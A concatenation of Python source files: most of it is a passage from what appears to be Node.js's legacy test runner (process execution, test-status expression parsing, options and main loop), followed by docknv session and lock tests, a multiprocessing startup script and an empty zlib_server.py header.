process = subprocess.Popen(
args = popen_args,
**rest
)
if faketty:
os.close(rest['stdout'])
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
output = ''
if faketty:
while True:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
break
# source: http://stackoverflow.com/a/12471855/1903116
# related: http://stackoverflow.com/q/11165521/1903116
try:
data = os.read(pty_out, 9999)
except OSError as e:
if e.errno != errno.EIO:
raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
output += data
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out, output)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError, e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env={}, faketty=False, disable_core_files=False):
if faketty:
import pty
(out_master, fd_out) = pty.openpty()
fd_in = fd_err = fd_out
pty_out = out_master
else:
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
fd_in = 0
pty_out = None
env_copy = os.environ.copy()
# Remove NODE_PATH
if "NODE_PATH" in env_copy:
del env_copy["NODE_PATH"]
# Extend environment
for key, value in env.iteritems():
env_copy[key] = value
preexec_fn = None
if disable_core_files and not utils.IsWindows():
def disableCoreFiles():
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
preexec_fn = disableCoreFiles
(process, exit_code, timed_out, output) = RunProcess(
context,
timeout,
args = args,
stdin = fd_in,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
faketty = faketty,
pty_out = pty_out,
preexec_fn = preexec_fn
)
if faketty:
os.close(out_master)
errors = ''
else:
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(NormalizePath(file[i])):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
result += tests
for i in range(1, context.repeat):
result += copy.deepcopy(tests)
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat, abort_on_timeout):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
self.abort_on_timeout = abort_on_timeout
self.v8_enable_inspector = True
def GetVm(self, arch, mode):
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
if not exists(name + '.exe'):
name = name.replace('out/', '')
name = os.path.abspath(name + '.exe')
if not exists(name):
raise ValueError('Could not find executable. Should be ' + name)
return name
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
self.parallel = self.case.parallel
self.disable_core_files = self.case.disable_core_files
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
raise Exception("Malformed line: '%s'." % line)
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
help='write test output to file. NOTE: this only applies the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=120, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--check-deopts", help="Check tests for permanent deoptimizations",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
result.add_option('--abort-on-timeout',
help='Send SIGABRT instead of SIGTERM to kill processes that time out',
default=False, action="store_true", dest="abort_on_timeout")
result.add_option("--type",
help="Type of build (simple, fips)",
default=None)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print "The run argument must be two comma-separated integers."
return False
else:
try:
options.run = map(int, options.run)
except ValueError:
print "Could not parse the integers from the run argument."
return False
if options.run[0] < 0 or options.run[1] < 0:
print "The run argument cannot have negative integers."
return False
if options.run[0] >= options.run[1]:
print "The test group to run (n) must be smaller than number of groups (m)."
return False
if options.J:
# inherit JOBS from environment if provided. some virtualised systems
# tends to exaggerate the number of available cpus/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in ["run", "skip", "dontcare"]:
print "Unknown flaky-tests mode %s" % options.flaky_tests
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def NormalizePath(path, prefix='test/'):
# strip the extra path information of the specified test
prefix = prefix.replace('\\', '/')
path = path.replace('\\', '/')
if path.startswith(prefix):
path = path[len(prefix):]
if path.endswith('.js'):
path = path[:-3]
elif path.endswith('.mjs'):
path = path[:-4]
return path
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
# these suites represent special cases that should not be run as part of the
# default JavaScript test-run, e.g., internet/ requires a network connection,
# addons/ requires compilation.
IGNORED_SUITES = [
'addons',
'addons-napi',
'doctool',
'gc',
'internet',
'pummel',
'test-known-issues',
'tick-processor',
'timers'
]
def ArgsToTestPaths(test_root, args, suites):
if len(args) == 0 or 'default' in args:
def_suites = filter(lambda s: s not in IGNORED_SUITES, suites)
args = filter(lambda a: a != 'default', args) + def_suites
subsystem_regex = re.compile(r'^[a-zA-Z-]*$')
check = lambda arg: subsystem_regex.match(arg) and (arg not in suites)
mapped_args = ["*/test*-%s-*" % arg if check(arg) else arg for arg in args]
paths = [SplitPath(NormalizePath(a)) for a in mapped_args]
return paths
def get_env_type(vm, options_type, context):
if options_type is not None:
env_type = options_type
else:
# 'simple' is the default value for 'env_type'.
env_type = 'simple'
ssl_ver = Execute([vm, '-p', 'process.versions.openssl'], context).stdout
if 'fips' in ssl_ver:
env_type = 'fips'
return env_type
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, mode='wb')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
test_root = join(workspace, 'test')
suites = GetSuites(test_root)
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
paths = ArgsToTestPaths(test_root, args, suites)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.check_deopts:
options.node_args.append("--trace-opt")
options.node_args.append("--trace-file-names")
# --always-opt is needed because many tests do not run long enough for the
# optimizer to kick in, so this flag will force it to run.
options.node_args.append("--always-opt")
options.progress = "deopts"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat,
options.abort_on_timeout)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print "Can't find shell executable: '%s'" % vm
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
if archEngineContext.exit_code is not 0 or vmArch == "undefined":
print "Can't determine the arch of: '%s'" % vm
print archEngineContext.stderr.rstrip()
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
'type': get_env_type(vm, options.type, context),
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
(cases, unused_rules, _) = (
config.ClassifyTests(test_list, env))
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
# We want to skip the inspector tests if node was built without the inspector.
has_inspector = Execute([vm,
"-p", "process.config.variables.v8_enable_inspector"], context)
if has_inspector.stdout.rstrip() == "0":
context.v8_enable_inspector = False
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
os.environ['NODE_TEST_DIR'] = tempdir
try:
os.makedirs(tempdir)
except OSError as exception:
if exception.errno != errno.EEXIST:
print "Could not create the temporary directory", options.temp_dir
sys.exit(1)
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
if SKIP in case.outcomes or SLOW in case.outcomes:
return True
return FLAKY in case.outcomes and options.flaky_tests == SKIP
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if options.run is not None:
# Must ensure the list of tests is sorted before selecting, to avoid
# silent errors if this file is changed to list the tests in a way that
# can be different in different machines
cases_to_run.sort(key=lambda c: (c.case.arch, c.case.mode, c.case.file))
cases_to_run = [ cases_to_run[i] for i
in xrange(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration.total_seconds())
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
test_user.py
|
"""User handler tests."""
import os
import threading
import time
import pytest
from docknv.tests.utils import using_temporary_directory
from docknv.user import UserSession, ProjectLocked, user_get_username
def test_real_ids():
"""Real IDs."""
os.environ.pop("DOCKNV_TEST_ID")
os.environ.pop("DOCKNV_TEST_USERNAME")
assert user_get_username() != "test"
os.environ["DOCKNV_TEST_ID"] = "1"
os.environ["DOCKNV_TEST_USERNAME"] = "1"
def test_session_paths():
"""Session paths."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
paths = session.get_paths()
assert paths.get_project_root() == os.path.join(
project_path, ".docknv"
)
assert paths.get_user_root() == os.path.join(
project_path, ".docknv", "test"
)
assert paths.get_user_configuration_root("toto") == os.path.join(
project_path, ".docknv", "test", "toto"
)
assert paths.get_file_path("tutu") == os.path.join(
project_path, ".docknv", "test", "tutu"
)
assert paths.get_file_path("tutu", "toto") == os.path.join(
project_path, ".docknv", "test", "toto", "tutu"
)
def test_session_config():
"""Session config."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
# No configuration set
assert session.get_current_configuration() is None
# Setting one configuration
session.set_current_configuration("pouet")
assert session.get_current_configuration() == "pouet"
# Unset
session.unset_current_configuration()
assert session.get_current_configuration() is None
def test_session_existing():
"""Session tests."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session_file = os.path.join(
project_path, ".docknv", "test", "docknv.yml"
)
os.makedirs(os.path.dirname(session_file))
with open(session_file, mode="w") as handle:
handle.write("current:")
session = UserSession.load_from_path(user_get_username(), project_path)
assert "current" in session.session_data
assert session.session_data["current"] is None
# Save
session.save()
# Remove
session.remove_path(force=True)
session.remove_path(force=True)
session.remove_path("toto", force=True)
def test_session_lock():
"""Session lock."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
lock = session.get_lock()
assert lock.get_file() == f"{project_path}/.test.lock"
# Lock should be disabled
assert not lock.is_enabled
# Unlocking should work
assert lock.unlock()
# Locking should work
assert lock.lock()
# Lock should be enabled
assert lock.is_enabled
# Lockfile should contain a $
with open(lock.get_file(), mode="r") as handle:
assert handle.read() == "$"
# Relocking should return False
assert not lock.lock()
# But unlocking should work
assert lock.unlock()
# And is should be disabled
assert not lock.is_enabled
# And the file should not exist
with pytest.raises(IOError):
with open(lock.get_file(), mode="r") as handle:
pass
# Try-lock test
with lock.try_lock():
# Lock should be enabled
assert lock.is_enabled
# Now, lock should be disabled
assert not lock.is_enabled
# Second try-lock test
assert lock.lock()
with pytest.raises(ProjectLocked):
with lock.try_lock():
pass
assert lock.is_enabled
# Third try-lock test
assert lock.unlock()
with pytest.raises(RuntimeError):
with lock.try_lock():
assert lock.is_enabled
# Raise exception
raise RuntimeError("oops")
# Should be unlocked
assert not lock.is_enabled
# Try-lock w/ timeout test
lock.lock()
with pytest.raises(ProjectLocked):
with lock.try_lock(timeout=2):
pass
# Try-lock w/ timeout, waiting for unlock
def unlock_thread():
time.sleep(2)
lock.unlock()
thr1 = threading.Thread(target=unlock_thread)
thr1.start()
assert lock.is_enabled
with lock.try_lock(timeout=2):
pass
thr1.join()
assert not lock.is_enabled
# Try-lock /w infinite timeout, waiting for unlock
def unlock_thread2():
time.sleep(3)
lock.unlock()
lock.lock()
thr1 = threading.Thread(target=unlock_thread2)
thr1.start()
with lock.try_lock(timeout=-1):
pass
thr1.join()
assert not lock.is_enabled
|
start-VNF-LISTENER_1_from_2.py
|
#---- Python VM startup for LISTENER_1_from_2 ---
import multiprocessing
import time
import LISTENER_1_from_2
import DECRYPT_1_from_2
import ENCRYPT_2_to_1
import WRITER_2_to_1
processes = []
if __name__ == '__main__':
p = multiprocessing.Process(target=LISTENER_1_from_2.startLISTENER_1_from_2)
processes.append(p)
p.start()
print "started LISTENER_1_from_2"
time.sleep(5)
p = multiprocessing.Process(target=DECRYPT_1_from_2.startDECRYPT_1_from_2)
processes.append(p)
p.start()
print "started DECRYPT_1_from_2"
time.sleep(5)
p = multiprocessing.Process(target=ENCRYPT_2_to_1.startENCRYPT_2_to_1)
processes.append(p)
p.start()
print "started ENCRYPT_2_to_1"
time.sleep(5)
p = multiprocessing.Process(target=WRITER_2_to_1.startWRITER_2_to_1)
processes.append(p)
p.start()
print "started WRITER_2_to_1"
time.sleep(5)
for p in processes:
p.join()
|
zlib_server.py
|
#!/usr/bin/env python
# encoding: utf-8
#
